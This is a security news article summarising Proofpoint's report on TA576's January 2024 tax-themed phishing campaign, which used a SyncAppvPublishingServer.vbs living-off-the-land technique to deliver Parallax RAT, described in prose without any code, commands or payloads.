TA576's Tax-Season Assault with New SyncAppvPublishingServer Attack Strategy

Embracing the yearly ritual of tax-themed phishing, a new campaign has emerged, targeting organizations associated with accounting and financial services. Security researchers Tommy Madjar and Selena Larson at Proofpoint have unveiled a campaign attributed to the threat actor TA576, known to operate during this particular time of the year as TA576 is "only active the first few months of the year during U.S. tax season." With a focus on North American organizations, TA576's lures take advantage of services aiding tax preparation.

In the recent campaigns in January 2024, TA576 leveraged a compromised account to send emails with a reply-to address tied to a newly registered domain, presumably controlled by the threat actor. The initial benign email is designed to elicit a response from recipients willing to provide their services. Upon receiving a response, the threat actor will supply the victim with a malicious Google Firebase URL. If clicked, this URL led to the download of a zipped shortcut (LNK) file. Execution of this shortcut initiates an attack chain that prominently features the use of Living Off The Land Binaries (LOLBAS), with a notable technique being the threat actors' utilization of SyncAppvPublishingServer.vbs to execute PowerShell commands without invoking PowerShell itself. "If this shortcut was executed, it ran encoded PowerShell via the SyncAppvPublishingServer.vbs LOLBAS inject. The PowerShell command launched Mshta to run the HTML application (HTA) payload from a provided URL," Proofpoint explains.

The attack chain completes with the installation of Parallax RAT, a new RAT of choice with prior campaigns utilizing RATs like NetWire. Proofpoint notes, TA576's refined strategies differ from earlier campaigns that relied on URLs for zipped JavaScript payloads or macro-enabled Word documents.